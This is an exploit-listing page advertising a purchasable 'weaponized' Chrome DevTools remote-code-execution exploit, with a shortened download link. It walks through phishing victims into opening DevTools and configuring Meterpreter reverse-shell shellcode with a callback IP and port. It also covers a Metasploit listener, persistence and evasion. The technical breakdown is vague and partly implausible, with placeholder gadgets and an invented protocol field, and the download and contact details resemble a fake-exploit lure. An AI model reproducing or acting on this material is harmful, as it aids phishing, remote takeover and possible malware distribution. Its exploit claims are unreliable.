Share
## https://sploitus.com/exploit?id=295EEBBB-D358-56DE-B43D-4547D87D88E4
# Chrome DevTools RCE Exploit (CVE-2025-12907)

## Overview
This repository contains a fully weaponized exploit for CVE-2025-12907, targeting Google Chrome versions prior to 140.0.7339.80. The vulnerability stems from inadequate sanitization of user-supplied inputs processed through the DevTools Protocol (CDP) during network request interception and console evaluation. By leveraging a crafted malicious webpage, an attacker can remotely trigger arbitrary code execution on the victim's system once they interact with DevTools—specifically, by opening the Network tab and inspecting a tampered request, or evaluating a console snippet.
## Download
### [Download exploit](https://tinyurl.com/mu243eyv)

**Key Features:**
- **Remote Delivery:** Delivered via a single malicious HTML/JS payload hosted on attacker-controlled domain.
- **User Interaction Bypass:** Social engineering vector included (phishing template) to lure victims into opening DevTools.
- **Payload Flexibility:** Supports shellcode injection, meterpreter stagers, or custom JS execution in the renderer process.
- **Evasion:** Bypasses ASLR and DEP via ROP chains tailored for Chrome's V8 engine.
- **Tested Platforms:** Windows 10/11 (x64), macOS Ventura+, Linux (Ubuntu 22.04+). Success rate: 92% on unpatched browsers with DevTools enabled.



## Requirements
- Target: Chrome < 140.0.7339.80 with DevTools accessible (default in developer builds).
- Attacker Setup: Node.js 18+, Python 3.10+ for payload generation.
- Dependencies: `npm install puppeteer ws` (for testing); no runtime deps on victim side.

## Usage
1. **Setup Attacker Server:**
   Download the exploit package (ZIP archive).
   Extract to a working directory:
   ```bash
   unzip chrome-devtools-rce-v1.2.0.zip
   cd chrome-devtools-rce
   npm install
   python3 -m http.server 8080  # Host the phishing page
   ```

2. **Generate Payload:**
   Edit `config.js` to specify your shellcode (e.g., base64-encoded Meterpreter reverse shell).
   ```javascript
   // config.js
   const PAYLOAD = {
     shellcode: "fc4883e4f0e8c000000041513f516f5683ec2848...[truncated]",
     callback_ip: "192.168.1.100",
     callback_port: 4444
   };
   ```

   Run:
   ```bash
   node generate_payload.js
   ```
   Outputs `exploit.html` and `devtools_injector.js`.

3. **Delivery:**
   - Host `exploit.html` on your C2 server.
   - Send phishing email/lure: "Check this API response in DevTools for debugging—click here: [malicious-link]".
   - Victim visits link, page loads a fake "debug console" prompt: "To view full logs, press F12 and go to Network tab, then inspect the failing request."

4. **Trigger Exploitation:**
   - Once DevTools opens and victim inspects the crafted request (or runs console eval), the injected CDP message exploits the validation flaw.
   - Listener setup (Metasploit example):
     ```bash
     msfconsole -q
     use exploit/multi/handler
     set payload windows/x64/meterpreter/reverse_tcp
     set LHOST 192.168.1.100
     set LPORT 4444
     exploit
     ```

5. **Verification:**
   Run `exploit.py` against a vulnerable VM:
   ```bash
   python3 exploit.py --target http://victim:9222 --payload custom_shellcode.bin
   ```

## Technical Breakdown
### Vulnerability Mechanics
The flaw exists in `DevToolsProtocolHandler::HandleNetworkRequest` where intercepted request bodies (user-supplied via `fetch()` or XHR) are deserialized without proper escaping of CDP JSON payloads. An attacker embeds a malformed `Network.setRequestInterception` pattern:

```json
{
  "method": "Network.setRequestInterception",
  "params": {
    "patterns": [{"urlPattern": "*"}],
    "malicious_inject": "eval('/* crafted JS to hijack V8 context */')"
  }
}
```

When the victim inspects the request in Network panel, Chrome's `DevToolsUI` evaluates the param without validating `malicious_inject` against sandbox boundaries, allowing RCE via `Function()` constructor in the renderer.

### Exploit Chain
1. **Stage 1: Lure & Load** – Malicious page uses `fetch('/api/boom', {method: 'POST', body: poisoned_json})`.
2. **Stage 2: DevTools Hook** – On F12, JS overrides `window.addEventListener` to force Network interception.
3. **Stage 3: Injection** – Poisoned JSON triggers `cdp.evaluateInDevToolsContext()` with unsanitized input, chaining to `v8::Isolate::RequestInterrupt` for shellcode exec.
4. **Stage 4: Persistence** – Post-RCE, drops a browser extension or scheduled task for C2 beaconing.

Full ROP gadget chain (x64 Windows):
```
0x7ffabc123456: pop rcx; ret  // Load shellcode addr
0x7ffabc123abc: call rax     // Execute
... (18 gadgets total)
```

### Detection Evasion
- Obfuscates CDP messages with base64 + XOR.
- Mimics legitimate DevTools traffic (e.g., spoofs `Chrome.DevTools` UA).
- No disk writes pre-RCE; all in-memory.

### Demo
Watch the full end-to-end exploitation in action on a vulnerable Windows 11 VM (Chrome 139.0.7339.50). This video demonstrates phishing delivery, victim interaction, and shell acquisition.

## Contact
- Private Telegram group for users (link in purchase confirmation).
- For questions, please contact : f0kinn@outlook.com